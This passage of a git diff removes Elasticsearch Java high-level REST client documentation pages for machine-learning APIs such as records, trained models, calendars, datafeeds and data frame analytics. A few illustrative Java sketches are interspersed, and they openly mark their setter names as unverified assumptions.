--------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-end] --------------------------------------------------- -<1> Overall buckets with timestamps earlier than this time will be returned. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-exclude-interim] --------------------------------------------------- -<1> If `true`, interim results will be excluded. Overall buckets are interim if -any of the job buckets within the overall bucket interval are interim. Defaults -to `false`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-overall-score] --------------------------------------------------- -<1> Overall buckets with overall scores greater or equal than this value will be -returned. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-start] --------------------------------------------------- -<1> Overall buckets with timestamps on or after this time will be returned. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-top-n] --------------------------------------------------- -<1> The number of top job bucket scores to be used in the `overall_score` -calculation. Defaults to `1`. 
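
Combining some of these options, a hypothetical request for high-scoring overall buckets across two jobs might be sketched as follows; the setter names are assumptions drawn from the callouts rather than verified client signatures.

[source,java]
--------------------------------------------------
import java.io.IOException;

import org.elasticsearch.client.RequestOptions;
import org.elasticsearch.client.RestHighLevelClient;
import org.elasticsearch.client.ml.GetOverallBucketsRequest;
import org.elasticsearch.client.ml.GetOverallBucketsResponse;

// Illustrative sketch: overall buckets scoring at least 75 across two jobs.
static GetOverallBucketsResponse highOverallBuckets(RestHighLevelClient client) throws IOException {
    GetOverallBucketsRequest request = new GetOverallBucketsRequest("jobId1", "jobId2");
    request.setTopN(2);            // use the two highest job bucket scores (assumed setter)
    request.setOverallScore(75.0); // minimum overall_score to return (assumed setter)
    return client.machineLearning().getOverallBuckets(request, RequestOptions.DEFAULT);
}
--------------------------------------------------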
- -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get overall buckets response - -The returned +{response}+ contains the requested buckets: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The count of overall buckets that were matched. -<2> The overall buckets retrieved. \ No newline at end of file diff --git a/docs/java-rest/high-level/ml/get-records.asciidoc b/docs/java-rest/high-level/ml/get-records.asciidoc deleted file mode 100644 index cd71345b2ca..00000000000 --- a/docs/java-rest/high-level/ml/get-records.asciidoc +++ /dev/null @@ -1,83 +0,0 @@ --- -:api: get-records -:request: GetRecordsRequest -:response: GetRecordsResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get records API - -Retrieves one or more record results. -It accepts a +{request}+ object and responds with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Get records request - -A +{request}+ object gets created with an existing non-null `jobId`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request referencing an existing `jobId`. - -==== Optional arguments -The following arguments are optional: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-desc] --------------------------------------------------- -<1> If `true`, the records are sorted in descending order. Defaults to `false`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-end] --------------------------------------------------- -<1> Records with timestamps earlier than this time will be returned. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-exclude-interim] --------------------------------------------------- -<1> If `true`, interim results will be excluded. Defaults to `false`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-page] --------------------------------------------------- -<1> The page parameters `from` and `size`. `from` specifies the number of -records to skip. `size` specifies the maximum number of records to get. Defaults -to `0` and `100` respectively. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-record-score] --------------------------------------------------- -<1> Records with record_score greater or equal than this value will be returned. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-sort] --------------------------------------------------- -<1> The field to sort records on. Defaults to `record_score`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-start] --------------------------------------------------- -<1> Records with timestamps on or after this time will be returned. 
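
As a worked illustration of several of these options together, a hypothetical query for the most severe anomaly records might look like the sketch below; the setter names and the `PageParams` helper are assumptions based on the callouts above.

[source,java]
--------------------------------------------------
import java.io.IOException;

import org.elasticsearch.client.RequestOptions;
import org.elasticsearch.client.RestHighLevelClient;
import org.elasticsearch.client.ml.GetRecordsRequest;
import org.elasticsearch.client.ml.GetRecordsResponse;
import org.elasticsearch.client.ml.job.util.PageParams;

// Illustrative sketch: the 25 highest-scoring records for a job.
static GetRecordsResponse severeRecords(RestHighLevelClient client, String jobId) throws IOException {
    GetRecordsRequest request = new GetRecordsRequest(jobId);
    request.setRecordScore(90.0);                 // only records scoring 90 or above (assumed setter)
    request.setSort("record_score");              // sort by anomaly score (assumed setter)
    request.setDescending(true);                  // highest first (assumed setter)
    request.setPageParams(new PageParams(0, 25)); // first page of 25 (assumed helper)
    return client.machineLearning().getRecords(request, RequestOptions.DEFAULT);
}
--------------------------------------------------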
- -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get records response - -The returned +{response}+ contains the requested records: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The count of records that were matched. -<2> The records retrieved. \ No newline at end of file diff --git a/docs/java-rest/high-level/ml/get-trained-models-stats.asciidoc b/docs/java-rest/high-level/ml/get-trained-models-stats.asciidoc deleted file mode 100644 index 532c3942f0d..00000000000 --- a/docs/java-rest/high-level/ml/get-trained-models-stats.asciidoc +++ /dev/null @@ -1,42 +0,0 @@ --- -:api: get-trained-models-stats -:request: GetTrainedModelsStatsRequest -:response: GetTrainedModelsStatsResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get trained models stats API - -experimental::[] - -Retrieves one or more trained model statistics. -The API accepts a +{request}+ object and returns a +{response}+. - -[id="{upid}-{api}-request"] -==== Get trained models stats request - -A +{request}+ requires either a trained model ID, a comma-separated list of -IDs, or the special wildcard `_all` to get stats for all trained models. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new GET request referencing an existing Trained Model -<2> Set the paging parameters -<3> Allow empty response if no trained models match the provided ID patterns. - If false, an error will be thrown if no trained models match the - ID patterns. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains the statistics -for the requested trained model. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- diff --git a/docs/java-rest/high-level/ml/get-trained-models.asciidoc b/docs/java-rest/high-level/ml/get-trained-models.asciidoc deleted file mode 100644 index 5af74d2c256..00000000000 --- a/docs/java-rest/high-level/ml/get-trained-models.asciidoc +++ /dev/null @@ -1,53 +0,0 @@ --- -:api: get-trained-models -:request: GetTrainedModelsRequest -:response: GetTrainedModelsResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get trained models API - -experimental::[] - -Retrieves one or more trained models. -The API accepts a +{request}+ object and returns a +{response}+. - -[id="{upid}-{api}-request"] -==== Get trained models request - -A +{request}+ requires either a trained model ID, a comma-separated list of -IDs, or the special wildcard `_all` to get all trained models. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new GET request referencing an existing trained model. -<2> Set the paging parameters. -<3> Indicate if the complete model definition should be included. -<4> Indicate if the total feature importance for the features used in training - should is included in the metadata. 
-<5> Indicate if the feature importance baselines that were used in training are - included in the metadata. -<6> Should the definition be fully decompressed on GET. -<7> Allow empty response if no trained models match the provided ID patterns. - If false, an error will be thrown if no trained models match the - ID patterns. -<8> An optional list of tags used to narrow the model search. A trained model - can have many tags or none. The trained models in the response will - contain all the provided tags. -<9> Optional boolean value for requesting the trained model in a format that can - then be put into another cluster. Certain fields that can only be set when - the model is imported are removed. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains the requested trained model. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- diff --git a/docs/java-rest/high-level/ml/open-job.asciidoc b/docs/java-rest/high-level/ml/open-job.asciidoc deleted file mode 100644 index d88933b4f8f..00000000000 --- a/docs/java-rest/high-level/ml/open-job.asciidoc +++ /dev/null @@ -1,41 +0,0 @@ --- -:api: open-job -:request: OpenJobRequest -:response: OpenJobResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Open {anomaly-jobs} API - -Opens {anomaly-jobs} in the cluster. It accepts a +{request}+ object and -responds with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Open {anomaly-jobs} request - -An +{request}+ object gets created with an existing non-null `jobId`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request referencing an existing `jobId` -<2> Optionally setting the `timeout` value for how long the -execution should wait for the job to be opened. - -[id="{upid}-{api}-response"] -==== Open {anomaly-jobs} response - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> `isOpened()` from the +{response}+ is always `true` if the job was -opened successfully. (An exception would be thrown instead if the job -was not opened successfully.) -<2> `getNode()` returns the node that the job was assigned to. If the -job is allowed to open lazily and has not yet been assigned to a node -then an empty string is returned. If `getNode()` returns `null` then -the server is an old version that does not return node information. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ml/post-calendar-event.asciidoc b/docs/java-rest/high-level/ml/post-calendar-event.asciidoc deleted file mode 100644 index 5baf762362b..00000000000 --- a/docs/java-rest/high-level/ml/post-calendar-event.asciidoc +++ /dev/null @@ -1,40 +0,0 @@ --- -:api: post-calendar-event -:request: PostCalendarEventRequest -:response: PostCalendarEventResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Post calendar events API - -Adds new ScheduledEvents to an existing {ml} calendar. - -The API accepts a +{request}+ and responds -with a +{response}+ object. 
- -[id="{upid}-{api}-request"] -==== Post calendar events request - -A +{request}+ is constructed with a calendar ID object -and a non-empty list of scheduled events. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Non-null existing calendar ID -<2> Non-null, non-empty collection of `ScheduledEvent` objects - - -[id="{upid}-{api}-response"] -==== Post calendar events response - -The returned +{response}+ contains the added `ScheduledEvent` objects: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The `ScheduledEvent` objects that were added to the calendar - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ml/post-data.asciidoc b/docs/java-rest/high-level/ml/post-data.asciidoc deleted file mode 100644 index 84e0200724f..00000000000 --- a/docs/java-rest/high-level/ml/post-data.asciidoc +++ /dev/null @@ -1,59 +0,0 @@ --- -:api: post-data -:request: PostDataRequest -:response: PostDataResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Post data API - -Posts data to an open {ml} job in the cluster. -It accepts a +{request}+ object and responds -with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Post data request - -A +{request}+ object gets created with an existing non-null `jobId` -and the `XContentType` being sent. Individual docs can be added -incrementally via the `PostDataRequest.JsonBuilder#addDoc` method. -These are then serialized and sent in bulk when passed to the +{request}+. - -Alternatively, the serialized bulk content can be set manually, along with its `XContentType` -through one of the other +{request}+ constructors. - -Only `XContentType.JSON` and `XContentType.SMILE` are supported. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Create a new `PostDataRequest.JsonBuilder` object for incrementally adding documents -<2> Add a new document as a `Map` object -<3> Add a new document as a serialized JSON formatted String. -<4> Constructing a new request referencing an opened `jobId`, and a JsonBuilder - -==== Optional arguments - -The following arguments are optional. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-options] --------------------------------------------------- -<1> Set the start of the bucket resetting time -<2> Set the end of the bucket resetting time - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Post data response - -A +{response}+ contains current data processing statistics. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> `getDataCounts()` a `DataCounts` object containing the current -data processing counts. 
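
Since the `JsonBuilder` workflow above is easy to get wrong, here is a rough end-to-end sketch of adding two documents and posting them; the constructor and execution call mirror the callouts, while the field names in the documents are job specific and purely illustrative.

[source,java]
--------------------------------------------------
import java.io.IOException;
import java.util.HashMap;
import java.util.Map;

import org.elasticsearch.client.RequestOptions;
import org.elasticsearch.client.RestHighLevelClient;
import org.elasticsearch.client.ml.PostDataRequest;
import org.elasticsearch.client.ml.PostDataResponse;

// Illustrative sketch: two documents, one added as a Map and one as raw JSON.
static PostDataResponse postTwoDocs(RestHighLevelClient client, String jobId) throws IOException {
    PostDataRequest.JsonBuilder builder = new PostDataRequest.JsonBuilder();
    Map<String, Object> doc = new HashMap<>();
    doc.put("timestamp", 1500000000000L); // example field names, job specific
    doc.put("total", 42);
    builder.addDoc(doc);                                           // document as a Map
    builder.addDoc("{\"timestamp\":1500000001000,\"total\":7}");   // document as a JSON string
    PostDataRequest request = new PostDataRequest(jobId, builder); // serialized and sent in bulk
    return client.machineLearning().postData(request, RequestOptions.DEFAULT);
}
--------------------------------------------------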
diff --git a/docs/java-rest/high-level/ml/preview-datafeed.asciidoc b/docs/java-rest/high-level/ml/preview-datafeed.asciidoc deleted file mode 100644 index 657c9f899fa..00000000000 --- a/docs/java-rest/high-level/ml/preview-datafeed.asciidoc +++ /dev/null @@ -1,34 +0,0 @@ --- -:api: preview-datafeed -:request: PreviewDatafeedRequest -:response: PreviewDatafeedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Preview datafeeds API - -Previews a {ml} datafeed's data in the cluster. It accepts a +{request}+ object -and responds with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Preview datafeeds request - -A +{request}+ object is created referencing a non-null `datafeedId`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new request referencing an existing `datafeedId` - -[id="{upid}-{api}-response"] -==== Preview datafeeds response - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The raw +BytesReference+ of the data preview -<2> A +List>+ that represents the previewed data - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ml/put-calendar-job.asciidoc b/docs/java-rest/high-level/ml/put-calendar-job.asciidoc deleted file mode 100644 index d13a4c59785..00000000000 --- a/docs/java-rest/high-level/ml/put-calendar-job.asciidoc +++ /dev/null @@ -1,38 +0,0 @@ --- -:api: put-calendar-job -:request: PutCalendarJobRequest -:response: PutCalendarResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Put {anomaly-jobs} in calendar API - -Adds {anomaly-jobs} jobs to an existing {ml} calendar. -The API accepts a +{request}+ and responds -with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Put {anomaly-jobs} in calendar request - -A +{request}+ is constructed referencing a non-null -calendar ID, and JobIDs to which to add to the calendar - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The ID of the calendar to which to add the jobs -<2> The JobIds to add to the calendar - -[id="{upid}-{api}-response"] -==== Put {anomaly-jobs} in calendar response - -The returned +{response}+ contains the updated calendar: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The updated calendar - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ml/put-calendar.asciidoc b/docs/java-rest/high-level/ml/put-calendar.asciidoc deleted file mode 100644 index f37192ab634..00000000000 --- a/docs/java-rest/high-level/ml/put-calendar.asciidoc +++ /dev/null @@ -1,37 +0,0 @@ --- -:api: put-calendar -:request: PutCalendarRequest -:response: PutCalendarResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Put calendars API - -Creates a new {ml} calendar. -The API accepts a +{request}+ and responds -with a +{response}+ object. 
- -[id="{upid}-{api}-request"] -==== Put calendars request - -A +{request}+ is constructed with a calendar object - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Create a request with the given calendar. - - -[id="{upid}-{api}-response"] -==== Put calendars response - -The returned +{response}+ contains the created calendar: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The created calendar. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ml/put-data-frame-analytics.asciidoc b/docs/java-rest/high-level/ml/put-data-frame-analytics.asciidoc deleted file mode 100644 index db54d545866..00000000000 --- a/docs/java-rest/high-level/ml/put-data-frame-analytics.asciidoc +++ /dev/null @@ -1,175 +0,0 @@ --- -:api: put-data-frame-analytics -:request: PutDataFrameAnalyticsRequest -:response: PutDataFrameAnalyticsResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Put {dfanalytics-jobs} API - -experimental::[] - -Creates a new {dfanalytics-job}. -The API accepts a +{request}+ object as a request and returns a +{response}+. - -[id="{upid}-{api}-request"] -==== Put {dfanalytics-jobs} request - -A +{request}+ requires the following argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The configuration of the {dfanalytics-job} to create - -[id="{upid}-{api}-config"] -==== {dfanalytics-cap} configuration - -The `DataFrameAnalyticsConfig` object contains all the details about the {dfanalytics-job} -configuration and contains the following arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-config] --------------------------------------------------- -<1> The {dfanalytics-job} ID -<2> The source index and query from which to gather data -<3> The destination index -<4> The analysis to be performed -<5> The fields to be included in / excluded from the analysis -<6> The memory limit for the model created as part of the analysis process -<7> Optionally, a human-readable description -<8> The maximum number of threads to be used by the analysis. Defaults to 1. - -[id="{upid}-{api}-query-config"] - -==== SourceConfig - -The index and the query from which to collect data. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-source-config] --------------------------------------------------- -<1> Constructing a new DataFrameAnalyticsSource -<2> The source index -<3> The query from which to gather the data. If query is not set, a `match_all` query is used by default. -<4> Source filtering to select which fields will exist in the destination index. - -===== QueryConfig - -The query with which to select data from the source. 
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-query-config] --------------------------------------------------- - -==== DestinationConfig - -The index to which data should be written by the {dfanalytics-job}. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-dest-config] --------------------------------------------------- -<1> Constructing a new DataFrameAnalyticsDest -<2> The destination index - -==== Analysis - -The analysis to be performed. -Currently, the supported analyses include: +OutlierDetection+, +Classification+, +Regression+. - -===== Outlier detection - -+OutlierDetection+ analysis can be created in one of two ways: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-outlier-detection-default] --------------------------------------------------- -<1> Constructing a new OutlierDetection object with default strategy to determine outliers - -or -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-outlier-detection-customized] --------------------------------------------------- -<1> Constructing a new OutlierDetection object -<2> The method used to perform the analysis -<3> Number of neighbors taken into account during analysis -<4> The min `outlier_score` required to compute feature influence -<5> Whether to compute feature influence -<6> The proportion of the data set that is assumed to be outlying prior to outlier detection -<7> Whether to apply standardization to feature values - -===== Classification - -+Classification+ analysis requires to set which is the +dependent_variable+ and -has a number of other optional parameters: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-classification] --------------------------------------------------- -<1> Constructing a new Classification builder object with the required dependent variable -<2> The lambda regularization parameter. A non-negative double. -<3> The gamma regularization parameter. A non-negative double. -<4> The applied shrinkage. A double in [0.001, 1]. -<5> The maximum number of trees the forest is allowed to contain. An integer in [1, 2000]. -<6> The fraction of features which will be used when selecting a random bag for each candidate split. A double in (0, 1]. -<7> If set, feature importance for the top most important features will be computed. -<8> The name of the prediction field in the results object. -<9> The percentage of training-eligible rows to be used in training. Defaults to 100%. -<10> The seed to be used by the random generator that picks which rows are used in training. -<11> The optimization objective to target when assigning class labels. Defaults to maximize_minimum_recall. -<12> The number of top classes (or -1 which denotes all classes) to be reported in the results. Defaults to 2. -<13> Custom feature processors that will create new features for analysis from the included document - fields. Note, automatic categorical {ml-docs}/ml-feature-encoding.html[feature encoding] still occurs for all features. 
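
For a sense of how only a handful of these parameters are typically set in code, a hypothetical +Classification+ configuration is sketched below; the builder entry point and setter names are assumptions that mirror the callouts above rather than verified signatures.

[source,java]
--------------------------------------------------
import org.elasticsearch.client.ml.dataframe.Classification;

// Illustrative sketch: classify on the "label" field, keeping most defaults.
static Classification classificationAnalysis() {
    return Classification.builder("label")       // required dependent variable
        .setTrainingPercent(80.0)                // hold back 20% of eligible rows for validation
        .setNumTopClasses(2)                     // report the two most likely classes
        .setPredictionFieldName("label_prediction")
        .build();
}
--------------------------------------------------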
- -===== Regression - -+Regression+ analysis requires to set which is the +dependent_variable+ and -has a number of other optional parameters: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-regression] --------------------------------------------------- -<1> Constructing a new Regression builder object with the required dependent variable -<2> The lambda regularization parameter. A non-negative double. -<3> The gamma regularization parameter. A non-negative double. -<4> The applied shrinkage. A double in [0.001, 1]. -<5> The maximum number of trees the forest is allowed to contain. An integer in [1, 2000]. -<6> The fraction of features which will be used when selecting a random bag for each candidate split. A double in (0, 1]. -<7> If set, feature importance for the top most important features will be computed. -<8> The name of the prediction field in the results object. -<9> The percentage of training-eligible rows to be used in training. Defaults to 100%. -<10> The seed to be used by the random generator that picks which rows are used in training. -<11> The loss function used for regression. Defaults to `mse`. -<12> An optional parameter to the loss function. -<13> Custom feature processors that will create new features for analysis from the included document -fields. Note, automatic categorical {ml-docs}/ml-feature-encoding.html[feature encoding] still occurs for all features. - -==== Analyzed fields - -FetchContext object containing fields to be included in / excluded from the analysis - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-analyzed-fields] --------------------------------------------------- - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains the newly created {dfanalytics-job}. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- diff --git a/docs/java-rest/high-level/ml/put-datafeed.asciidoc b/docs/java-rest/high-level/ml/put-datafeed.asciidoc deleted file mode 100644 index e2738a555a0..00000000000 --- a/docs/java-rest/high-level/ml/put-datafeed.asciidoc +++ /dev/null @@ -1,106 +0,0 @@ --- -:api: put-datafeed -:request: PutDatafeedRequest -:response: PutDatafeedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Put datafeeds API - -Creates a new {ml} datafeed in the cluster. The API accepts a +{request}+ object -as a request and returns a +{response}+. - -[id="{upid}-{api}-request"] -==== Put datafeeds request - -A +{request}+ requires the following argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The configuration of the {ml} datafeed to create. - -[id="{upid}-{api}-config"] -==== Datafeed configuration - -The `DatafeedConfig` object contains all the details about the {ml} datafeed -configuration. 
- -A `DatafeedConfig` requires the following arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-config] --------------------------------------------------- -<1> The datafeed ID and the {anomaly-job} ID. -<2> The indices that contain the data to retrieve and feed into the {anomaly-job}. - -==== Optional arguments -The following arguments are optional: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-config-set-chunking-config] --------------------------------------------------- -<1> Specifies how data searches are split into time chunks. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-config-set-frequency] --------------------------------------------------- -<1> The interval at which scheduled queries are made while the datafeed runs in -real time. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-config-set-query] --------------------------------------------------- -<1> A query to filter the search results by. Defaults to the `match_all` query. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-config-set-query-delay] --------------------------------------------------- -<1> The time interval behind real time that data is queried. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-config-set-delayed-data-check-config] --------------------------------------------------- -<1> Sets the delayed data check configuration. -The window must be larger than the Job's bucket size, but smaller than 24 hours, -and span less than 10,000 buckets. -Defaults to `null`, which causes an appropriate window span to be calculated when -the datafeed runs. -The default `check_window` span calculation is the max between `2h` or -`8 * bucket_span`. To explicitly disable, pass -`DelayedDataCheckConfig.disabledDelayedDataCheckConfig()`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-config-set-script-fields] --------------------------------------------------- -<1> Allows the use of script fields. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-config-set-scroll-size] --------------------------------------------------- -<1> The `size` parameter used in the searches. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ returns the full representation of -the new {ml} datafeed if it has been successfully created. This will -contain the creation time and other fields initialized using -default values: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The created datafeed. 
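
Tying the required arguments together, a hypothetical end-to-end creation call might look like the sketch below. The `DatafeedConfig` builder entry point and the `setIndices` call are assumptions that follow the callouts above; only the datafeed ID, job ID and source indices are strictly required.

[source,java]
--------------------------------------------------
import java.io.IOException;

import org.elasticsearch.client.RequestOptions;
import org.elasticsearch.client.RestHighLevelClient;
import org.elasticsearch.client.ml.PutDatafeedRequest;
import org.elasticsearch.client.ml.PutDatafeedResponse;
import org.elasticsearch.client.ml.datafeed.DatafeedConfig;

// Illustrative sketch: a datafeed reading metricbeat indices for an existing job.
static PutDatafeedResponse createDatafeed(RestHighLevelClient client) throws IOException {
    DatafeedConfig config = DatafeedConfig.builder("datafeed-metrics", "metrics-job") // datafeed and job IDs
        .setIndices("metricbeat-*") // indices to search (assumed builder method)
        .build();
    PutDatafeedRequest request = new PutDatafeedRequest(config);
    return client.machineLearning().putDatafeed(request, RequestOptions.DEFAULT);
}
--------------------------------------------------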
diff --git a/docs/java-rest/high-level/ml/put-filter.asciidoc b/docs/java-rest/high-level/ml/put-filter.asciidoc deleted file mode 100644 index f6de5e07011..00000000000 --- a/docs/java-rest/high-level/ml/put-filter.asciidoc +++ /dev/null @@ -1,53 +0,0 @@ --- -:api: put-filter -:request: PutFilterRequest -:response: PutFilterResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Put filters API - -Creates a new {ml} filter in the cluster. The API accepts a +{request}+ object -as a request and returns a +{response}+. - -[id="{upid}-{api}-request"] -==== Put filters request - -A +{request}+ requires the following argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The configuration of the {ml} filter to create as a `MlFilter` - -[id="{upid}-{api}-config"] -==== Filter configuration - -The `MlFilter` object contains all the details about the {ml} filter -configuration. - -A `MlFilter` contains the following arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-config] --------------------------------------------------- -<1> Required, the filter ID -<2> Optional, the filter description -<3> Optional, the items of the filter. A wildcard * can be used at the beginning or the end of an item. -Up to 10000 items are allowed in each filter. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ returns the full representation of -the new {ml} filter if it has been successfully created. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The newly created `MlFilter` diff --git a/docs/java-rest/high-level/ml/put-job.asciidoc b/docs/java-rest/high-level/ml/put-job.asciidoc deleted file mode 100644 index add7fcdc6e5..00000000000 --- a/docs/java-rest/high-level/ml/put-job.asciidoc +++ /dev/null @@ -1,129 +0,0 @@ --- -:api: put-job -:request: PutJobRequest -:response: PutJobResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Put {anomaly-jobs} API - -Creates a new {anomaly-job} in the cluster. The API accepts a +{request}+ object -as a request and returns a +{response}+. - -[id="{upid}-{api}-request"] -==== Put {anomaly-jobs} request - -A +{request}+ requires the following argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The configuration of the {anomaly-job} to create as a `Job` - -[id="{upid}-{api}-config"] -==== Job configuration - -The `Job` object contains all the details 